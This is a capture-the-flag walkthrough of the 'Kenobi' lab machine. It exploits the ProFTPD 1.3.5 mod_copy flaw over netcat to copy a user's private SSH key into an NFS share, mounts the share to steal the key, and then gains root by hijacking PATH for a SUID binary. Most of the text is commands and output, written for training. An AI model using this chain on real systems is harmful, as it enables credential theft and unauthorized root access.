Skip to main content

Kenobi

ProFTPD

ProFTPD Version: 1.3.5 [Vulnerability: MOD_COPY Module]

Since we know that the User: Kenobi uses SSH we can Copy hes Keys into the NFS Shared Directory using the MOD_COPY Module Vulnerability. After that we can Mount it and Read the Private SSH Key


  • The NFS Share is Mounted in /var
  • The /var Directory has a tmp Directory we can copy the Private SSH Key to that Location
attacker@machine:~$ showmount -e 10.10.118.63
Export list for 10.10.118.63:
/var *

  • We can Connect using Netcat
  • Copying the Private SSH Key into the NFS Share:
attacker@machine:~$ nc 10.10.118.63 21 
220 ProFTPD 1.3.5 Server (ProFTPD Default Installation) [10.10.118.63]
SITE CPFR /home/kenobi/.ssh/id_rsa
350 File or directory exists, ready for destination name
SITE CPTO /var/tmp/id_rsa
250 Copy successful

NFS

  • Mounting the NFS Shared Directory
attacker@machine:~$ mkdir NFS
attacker@machine:~$ mount -t nfs 10.10.118.63:/var NFS -o nolock
  • Copying the Contents of id_rsa File
attacker@machine:~$ ls NFS
drwxr-xr-x  2 root root  4096  4 set  2019 backups
drwxr-xr-x  9 root root  4096  4 set  2019 cache
drwxrwxrwt  2 root root  4096  4 set  2019 crash
drwxr-xr-x 40 root root  4096  4 set  2019 lib
drwxrwsr-x  2 root games 4096 12 apr  2016 local
lrwxrwxrwx  1 root root     9  4 set  2019 lock -> /run/lock
drwxrwxr-x 10 root       4096  4 set  2019 log
drwxrwsr-x  2 root mem   4096 27 feb  2019 mail
drwxr-xr-x  2 root root  4096 27 feb  2019 opt
lrwxrwxrwx  1 root root     4  4 set  2019 run -> /run
drwxr-xr-x  2 root root  4096 30 gen  2019 snap
drwxr-xr-x  5 root root  4096  4 set  2019 spool
drwxrwxrwt  6 root root  4096  7 ott 08.36 tmp
drwxr-xr-x  3 root root  4096  4 set  2019 www
attacker@machine:~$ ls NFS/tmp
-rw-r--r-- 1 virtualbox virtualbox 1675 12 mag 02.44 id_rsa
attacker@machine:~$ cp NFS/tmp/id_rsa ~

Assign The Correct Permissions To ID_RSA
chmod 600 id_rsa

Privilege Escalation

  • We can Login using the Private SSH Key
kenobi@kenobi:~$ id
uid=1000(kenobi) gid=1000(kenobi) groups=1000(kenobi),4(adm),24(cdrom),27(sudo),30(dip),46(plugdev),110(lxd),113(lpadmin),114(sambashare)

  • The /usr/bin/menu Binary has the SUID Bit Set. 
kenobi@kenobi:~$ find / -type f -perm -04000 -ls 2>/dev/null
   ...
   280011     12 -rwsr-xr-x   1 root     root           8880 Sep  4  2019 /usr/bin/menu
   ...

  • The Script is using System Commands CURL - UNAME - IFCONFIG. We can Escalate our Privileges using Path Variable Manipulation.
kenobi@kenobi:~$ /usr/bin/menu
***************************************
1. status check
2. kernel version
3. ifconfig
** Enter your choice :
kenobi@kenobi:/tmp$ export PATH=/tmp:$PATH
kenobi@kenobi:/tmp$ echo "/bin/bash" > ifconfig && chmod 4777 ifconfig
kenobi@kenobi:/tmp$ /usr/bin/menu
1. status check
2. kernel version
3. ifconfig
** Enter your choice :3

root@kenobi:/tmp$ id
uid=0(root) gid=1000(kenobi) groups=1000(kenobi),4(adm),24(cdrom),27(sudo),30(dip),46(plugdev),110(lxd),113(lpadmin),114(sambashare)
root@kenobi:/tmp$ whoami
root